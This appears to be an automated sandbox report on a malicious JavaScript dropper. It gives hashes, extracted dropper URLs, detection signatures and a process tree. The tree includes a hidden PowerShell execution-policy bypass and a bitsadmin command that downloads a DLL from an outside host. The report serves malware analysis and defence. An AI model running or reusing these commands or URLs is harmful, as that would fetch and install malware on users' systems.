Analysis

  • max time kernel
    39s
  • max time network
    43s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    09/07/2023, 19:19

General

  • Target

    ave603jsjsjsjsjsjsjsjsjsj.js

  • Size

    46KB

  • MD5

    734c08060ad526d0c40be2cdef4c84d4

  • SHA1

    4db13fddae48543582f8975884770d5ec4b56482

  • SHA256

    48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d

  • SHA512

    fe00bc4d731bd2e0493a255cc0de5a1ff05aac8091ba2134c02f47e8f1ff723afbb25113d21646980952fb4991c818e29034770913d59e118ad892b2d13d443e

  • SSDEEP

    768:2edhq6YG8y1GT/BibL8NmKspYMWjAtRi3i/WfCS8IFvHkgAJBFyt:jHJR1G9ibLomd6DMtRYi/jWfkgAJfyt

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://virvatulishop.com/labda.zip

exe.dropper

https://virvatulishop.com/files/

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2872

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1

    Filesize

    1KB

    MD5

    d85c0eada7610417ac3448efa1975122

    SHA1

    0243c3ac3e03279f6abc4817906ab95d74c8c2f7

    SHA256

    7689232c0352a14f0ff0967d88e6964eddaf25e2d282f8484fa17abb3b486a37

    SHA512

    b3e627647589839f6383942a5db24d3b46fe0068027307eb6805e933ea481d550f8c59eab566dd9a62af1e8126efbd8416ad870da489623107415f2a8067c7d1

  • memory/1720-60-0x000000001B2A0000-0x000000001B582000-memory.dmp

    Filesize

    2.9MB

  • memory/1720-61-0x0000000002040000-0x0000000002048000-memory.dmp

    Filesize

    32KB

  • memory/1720-63-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-64-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-65-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-66-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-67-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-68-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-69-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB